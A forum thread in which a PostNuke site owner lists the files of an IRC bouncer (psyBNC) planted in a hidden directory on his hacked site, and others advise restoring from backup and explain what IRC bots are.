Dizkus

Hi there,
we have a module that was written for us that has been hacked by I believe a chat room type script.

Our host has taken the site off line, what I do not know is if PostNuke its self has been compromised.

The directory created was (.unsecured) which containes the following files:

-rw-r--r-- 1 httpd httpd 137 May 22 12:12 ci
-rw-r--r-- 1 httpd httpd 82 May 22 12:12 ci.dir
-rwxr-xr-x 1 httpd httpd 282 Jan 26 09:37 config
-rw------- 1 httpd httpd 929 Jan 26 09:18 config.h
-rw-r--r-- 1 httpd httpd 118 May 22 12:12 cron.d
-rwxr-xr-x 1 httpd httpd 335 Jan 26 09:36 fuck
drwxr-xr-x 2 httpd httpd 4096 Jan 26 09:18 help
drwxr-xr-x 2 httpd httpd 4096 Jan 26 09:18 lang
drwxr-xr-x 2 httpd httpd 4096 May 23 00:36 log
drwxr-xr-x 2 httpd httpd 4096 Jan 26 09:35 motd
-rwxr-xr-x 1 httpd httpd 14306 Jan 26 09:18 proc
-rwxr-xr-x 1 httpd httpd 202544 Jan 26 09:18 psybnc
-rw-r--r-- 1 httpd httpd 77 Jan 26 09:18 psybnc.conf
-rw------- 1 httpd httpd 6 May 23 00:36 psybnc.pid
-rwxr-xr-x 1 httpd httpd 60 Jan 26 09:37 run
drwxr-xr-x 2 httpd httpd 4096 Jan 26 09:18 scripts
-rwxr--r-- 1 httpd httpd 21516 Jan 26 09:18 xh
-rwxr--r-- 1 httpd httpd 383 May 22 12:12 y2kupdate

Plus Sub directories: Help, Lang, log, motd, scripts

I am a newbee to this and have not had this sort of problem before.

My question is, how can I check whether PN has been compromised? I can delete the Directory and reinstate my site but I do not want to do this until I know PN has not been affected.

Any help appreciated.

Thanks
CF

I would revert to a backup saved before the .unsecure directory was created. You can replace PN files with ease...just remember to save your config file and migrate the settings in it to the new one. Many times people will put small hacks in modules and PN itself, so if you have, be sure to replace those as well.

--
Photography | PHP | Other

My guuess is that it's an IRC bot thingy.

Usually they don't hack websites because the hackers are trying to fly under the radar with their bot so they don't get found out.

But it's always good to check... And reinstall if you're worried...

Thanks alarconcepts for the advice.
Silly question maybe, but is there anyway of checking for hacks in the other modules without working from a backup?

As in: hacks you made yourself?

--
Photography | PHP | Other

Beeb
What is IRC Bot, can you explain? Is there a way of finding out within the files.
Cheers

alarconcepts
I did not read your message correctly the first time, I see what you are saying now.
From what I have learned so far I think I am safe just deleting the directory and making the site operational again.
I would be interested to learn what I have done wrong to allow this code to be installed in our site.
Thanks

IRC = Internet Relay Chat

Bots are used to maintain and monitor the channel. A bot can automatically upgrade users to Moderators when they sign-on, or they can kick people off the channel for whatever reason.

System administrators don’t like bots running on their puters because they take up processing power. So the channel operators look for systems they can exploit to get their bots running.

I supposed if one looked at the configuration file they might be able to find out what channel the bot is for. But then what?

A nasty thing to do would be to lock up your system so they can’t get back in, modify the configuration files to ban the usual moderators, and so on…